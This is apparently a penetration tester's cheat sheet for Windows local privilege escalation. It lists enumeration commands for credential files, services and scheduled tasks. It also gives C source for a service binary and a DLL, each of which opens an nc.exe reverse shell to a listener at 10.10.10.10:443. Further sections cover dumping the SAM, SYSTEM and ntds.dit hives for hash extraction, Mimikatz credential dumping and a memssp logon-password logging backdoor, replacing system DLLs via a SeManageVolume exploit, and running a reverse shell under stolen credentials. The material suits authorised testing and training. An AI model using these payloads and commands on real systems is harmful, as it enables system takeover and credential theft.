Windows Enumeration (local privilege-escalation checklist)

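# Find Files
# Credential stores and config files anywhere on the system drive (.kdbx = KeePass database).
# -File keeps directories out of the listing; SilentlyContinue hides access-denied noise.
Get-ChildItem -Path C:\ -Include *.kdbx,*.ini -File -Recurse -ErrorAction SilentlyContinue

# Documents under every user profile (other users' folders only show up when their ACLs are loose).
Get-ChildItem -Path C:\Users -Include *.txt,*.ini,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

# Grep Strings
# Skip binary extensions so Select-String does not chew through them; -match/-notin and the
# Select-String pattern are all case-insensitive by default.
Get-ChildItem . -File -Recurse -ErrorAction SilentlyContinue | Where-Object Extension -notin '.exe','.dll','.jpg','.png','.zip' | Select-String 'password|secret|token|key|credential'

Select-String -Path * -Pattern "password|credential" -ErrorAction SilentlyContinue

# Check Installed Applications
# Query both hives: 32-bit software on a 64-bit host is registered under Wow6432Node.
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname

# Check Scheduled tasks
# /v adds "Run As User" and "Task To Run": look for tasks running as SYSTEM/admin whose binary
# or working directory you can write to.
schtasks /query /fo LIST /v > schtasks.txt

# Check Powershell History
# PSReadLine appends every interactive command to ConsoleHost_history.txt, so passwords typed
# on the command line (runas, New-Object PSCredential, net use ...) end up here.
# Current user (exact path as configured for this session):
type (Get-PSReadLineOption).HistorySavePath
# Every profile you can read — replaces the <Username> placeholder with a wildcard:
Get-ChildItem C:\Users\*\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -ErrorAction SilentlyContinue | ForEach-Object { "=== $($_.FullName) ==="; Get-Content $_.FullName }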

Service Binary Hijacking

Check service info (which account each service runs as, where its binary lives, and whether you can write to that binary or its directory)

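# Every Service
# StartName is the account the service runs as (LocalSystem = full compromise if hijacked);
# PathName is the binary whose ACL you need to check.
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName

# Every Running Service
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'}

# Every Service except system32 path
# findstr filters the formatted text PowerShell pipes to it (/V = invert, /I = ignore case).
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | findstr /VI "system32"

# Every Running Service except system32 path
Get-CimInstance -ClassName win32_service | Select Name,State,PathName,StartName | Where-Object {$_.State -like 'Running'} | findstr /VI "system32"

# Check Service Start Type (e.g. mysql)
# Wildcards so that e.g. "MySQL80" also matches — -like without them is just an equality test.
# Auto = the service comes back on reboot (needs SeShutdownPrivilege to force one);
# Manual = you need start/stop rights on the service object itself.
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like '*mysql*'}

# Check Write Access to a Service Binary (the actual precondition for binary hijacking)
# Look for (F), (M) or (W) granted to your user, Users, Authenticated Users or Everyone;
# a writable parent directory is enough if you can rename/replace the file.
icacls "C:\path\to\service.exe"

# Check Unquoted Service Path
# Only exploitable when the unquoted path contains a space AND you can write to one of the
# intermediate directories (C:\Program Files\My App\svc.exe -> drop C:\Program.exe or
# "C:\Program Files\My.exe"); check each candidate directory with icacls.
# cmd.exe syntax — """ is how cmd passes a literal double quote; this line does not parse in PowerShell:
wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

# PowerShell equivalents of the same filter:
wmic service get name,pathname | Select-String -NotMatch "C:\\Windows\\" | Select-String -NotMatch '"'

wmic service get name,pathname | Where-Object { $_ -notmatch "C:\\Windows\\" -and $_ -notmatch '"' }

# wmic is deprecated and missing on newer builds; this needs only CIM and already applies the
# "has a space and is not quoted" test:
Get-CimInstance -ClassName win32_service | Where-Object { $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and $_.PathName -notmatch 'C:\\Windows\\' } | Select Name,PathName,StartName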

Create Malicious Binary rev.exe (rev.c) — replace 10.10.10.10:443 with your listener, and stage nc.exe at C:\windows\tasks on the target before the service is restarted:

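#include <stdlib.h>

/* Service-binary payload: hands a cmd.exe to the listener at 10.10.10.10:443 through nc.exe.
 *
 * system() blocks until nc.exe exits, and this binary never calls StartServiceCtrlDispatcher,
 * so the SCM will report error 1053 ("did not respond ... in a timely fashion") when the service
 * is started. That is expected — the reverse shell has already connected by then.
 * Compile on Kali with the mingw line below; use i686-w64-mingw32-gcc for a 32-bit target. */
int main(void)
{
	/* Return the command status instead of parking it in an unused local. */
	return system("C:\\windows\\tasks\\nc.exe 10.10.10.10 443 -e cmd.exe");
}
// x86_64-w64-mingw32-gcc rev.c -o rev.exe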

Service Stop, Start, Misc…

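# Query Service
sc.exe query mysql

# Server Operators Abusing
# Members of Server Operators (or anyone holding SERVICE_CHANGE_CONFIG on the service) can repoint
# the service binary. sc.exe requires a SPACE after "binPath=": written as binPath="C:\..." it only
# prints the usage text and changes nothing.
sc.exe config VMTools binPath= "C:\Windows\Tasks\rev.exe"
# Confirm the new BINARY_PATH_NAME before restarting the service:
sc.exe qc VMTools

# Start Service
sc.exe start mysql
net start mysql
Start-Service -Name mysql

# Stop Service
sc.exe stop mysql
net stop mysql
Stop-Service -Name mysql

# Reboot PC — for Auto-start services you are not allowed to stop/start; needs SeShutdownPrivilege
# /r : reboot
# /t 0 : right now (0 seconds delay)
shutdown /r /t 0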

DLL Hijacking (needs either write access to a DLL a privileged process loads, or a writable directory earlier on that process's DLL search path)

Create Malicious DLL rev.dll (rev.cpp) — same listener/nc.exe prerequisites as rev.exe; the DLL must match the bitness of the process that loads it:

#include <stdlib.h>
#include <windows.h>
 
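// Hijack payload: when a process loads this DLL, spawn nc.exe back to 10.10.10.10:443.
//
// Caveats:
//  - DllMain runs while the loader lock is held, and system() blocks until nc.exe exits, so the
//    host process hangs for the lifetime of the shell. Fine for a one-shot escalation, noisy otherwise.
//  - Returning FALSE from DLL_PROCESS_ATTACH makes the loader fail the load, so always return TRUE.
//  - The payload fires once per process load only; thread attach/detach notifications are ignored.
//  - Keep this as .cpp: the original "int i;" right after a case label is valid C++ but not C.
BOOL APIENTRY DllMain(
HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved )
{
	(void)hModule;
	(void)lpReserved;
	if (ul_reason_for_call == DLL_PROCESS_ATTACH)
	{
		// Exit status is irrelevant here; the cast documents that it is dropped on purpose.
		(void)system("C:\\windows\\tasks\\nc.exe 10.10.10.10 443 -e cmd");
	}
	return TRUE;
}
// x86_64-w64-mingw32-gcc rev.cpp --shared -o rev.dll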

Privilege Abusing

SeBackupPrivilege (normally via the Backup Operators group): lets you read any file on the host with backup semantics, regardless of its ACL

#1. Local SAM, SYSTEM Registry dump

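# reg save
# reg.exe opens the hives with backup semantics, so with SeBackupPrivilege this works even though
# SAM/SYSTEM are readable only by SYSTEM/Administrators. Run it from a directory you can write to
# (e.g. C:\Windows\Tasks) — the output files land in the current directory.
reg save HKLM\SAM sam
reg save HKLM\SYSTEM system

# on kali (impacket), after transferring both files — the same offline flow as the ntds.dit case:
secretsdump.py -sam sam -system system LOCAL

# SAM,SYSTEM Path (for reference only: the live hive files are held open by the kernel, so copy
# them via reg save or from a shadow copy, never with copy/type)
# C:\Windows\System32\config\SAM
# C:\Windows\System32\config\SYSTEM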

#2. Disk Dump diskshadow + robocopy

# backup.txt
# diskshadow script: snapshot the C: volume and expose the read-only shadow as E:, so files the
# kernel keeps locked (ntds.dit, SAM, SYSTEM) can be copied from the copy.
# NOTE(review): the trailing space on each line is deliberate — scripts written outside Windows
# are widely reported to fail in diskshadow without it; verify on the target before removing.
set verbose on 
# the metadata .cab is written here, so this must be a directory you can write to
set metadata C:\Windows\Tasks\test.cab
# persistent: the shadow outlives the diskshadow run; remove it afterwards (delete shadows all)
set context persistent 
add volume C: alias cdrive 
create 
expose %cdrive% E: 
 
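# in target host:
# ntds.dit only exists on a Domain Controller; on a member server take E:\Windows\System32\config\SAM
# and SYSTEM from the same shadow instead.
diskshadow /s ./backup.txt
# /b = backup mode (uses SeBackupPrivilege and ignores the ACL). Naming the file copies just
# ntds.dit instead of the whole directory (edb*.log, *.chk, ...).
robocopy /b E:\Windows\ntds . ntds.dit

# download to kali & extract hashes
# ("download" is the transfer command of the shell in use, e.g. evil-winrm/meterpreter — not a native command)
download ntds.dit
# SYSTEM holds the boot key needed to decrypt the hashes; reg save works because of backup semantics.
reg save HKLM\SYSTEM SYSTEM
download SYSTEM
# on kali (impacket):
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL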

SeManageVolumePrivilege

github exploit (third-party code — read it before running it on a client system): https://github.com/CsEnox/SeManageVolumeExploit

Steps:

1. After running the exploit you can write to files under C:\Windows. This works by loosening the ACL on the system drive, which is a loud, system-wide change — record it for the report and for clean-up.
2. Replace a DLL that a privileged process loads with your malicious DLL (back up the original first; the replaced DLL is gone until you restore it).
3. Trigger the load.

#1. Trigger with systeminfo:

Change DLL file (copy the original aside first — systeminfo is broken for everyone until it is restored):
C:\windows\system32\wbem\tzres.dll
 
Trigger it:
systeminfo
=> If it works you get a shell as NETWORK SERVICE, not SYSTEM (presumably because the DLL is loaded by the WMI provider host that systeminfo queries — verify which account the shell runs as).

#2. Trigger with PrintNotify:

Change DLL file (back up the original first; this is the print-configuration DLL the spooler loads):
C:\Windows\System32\spool\drivers\x64\3\PrintConfig.dll 
 
Trigger it:
# Instantiating the PrintNotify COM class causes PrintConfig.dll (the path above) to be loaded
# by the print service, which then runs the replaced DLL — presumably as SYSTEM; verify which
# account the resulting shell runs as.
$printNotifyClsid = [Guid]"{854A20FB-2D44-457D-992F-EF13785D2B51}"
$object = [Activator]::CreateInstance([Type]::GetTypeFromCLSID($printNotifyClsid))

Mimikatz

Basic post-exploitation dump (run from an elevated, local-admin shell):

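# privilege::debug needs a high-integrity (local admin) shell for sekurlsa::logonpasswords;
# lsadump::sam additionally needs SYSTEM rights, so impersonate a SYSTEM token with token::elevate
# first or the SAM dump fails with a registry-open error.
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"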

When sekurlsa::logonpasswords returns nothing (Credential Guard / LSA protection in place), log credentials at the next logon instead:

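# memssp patches LSASS in memory to register a logging SSP: from now until reboot, the plaintext
# password of every logon on this host is appended to mimilsa.log. It is effectively a credential
# harvesting backdoor, so note it in the report and clean up (reboot) once you have what you need.
.\mimikatz.exe "privilege::debug" "misc::memssp" "exit"

# => After the next logon (interactive or network), read the log:
type C:\Windows\System32\mimilsa.log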

PowerUp.ps1

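# Dot-source the script first (from a "powershell -ep bypass" shell if the execution policy blocks it);
# the functions below do not exist until it is loaded.
. .\PowerUp.ps1

# Run every PowerUp check in one go
Invoke-AllChecks

# Check Modifiable Service Binary (service executables or their directories that your user can write to)
Get-ModifiableServiceFile

# Check Unquoted Service Path (unquoted paths containing a space, with the writable intermediate directories)
Get-UnquotedService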

WinPEAS

# Make Colored Output
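# Enable ANSI colour for the console so winPEAS output is readable.
# /f forces the overwrite: without it REG ADD prompts "Value exists, overwrite?" when the value is
# already present, which hangs a non-interactive reverse shell.
REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 /f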

Command Execute as Other User (Need Credential)

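# Run a command as another user whose plaintext password you already have.
# OPSEC: the password typed here is written to ConsoleHost_history.txt (see "Check Powershell History"
# above) — turn history saving off for this session first when PSReadLine is loaded.
if (Get-Command Set-PSReadLineOption -ErrorAction SilentlyContinue) { Set-PSReadLineOption -HistorySaveStyle SaveNothing }

$password = ConvertTo-SecureString -AsPlainText -Force -String "Password_Here"
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "SNIPER\Administrator",$password

# Invoke-Command to LOCALHOST goes over WinRM: the WinRM service must be running and the target
# user must be allowed to use it (local Administrators or Remote Management Users).
Invoke-Command -ComputerName LOCALHOST -ScriptBlock { C:\windows\tasks\nc.exe 10.10.10.10 443 -e cmd.exe} -Credential $credential

# Alternative that does not need WinRM (may fail from a non-interactive shell, e.g. a service context):
# Start-Process -FilePath C:\windows\tasks\nc.exe -ArgumentList "10.10.10.10 443 -e cmd.exe" -Credential $credential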

Reference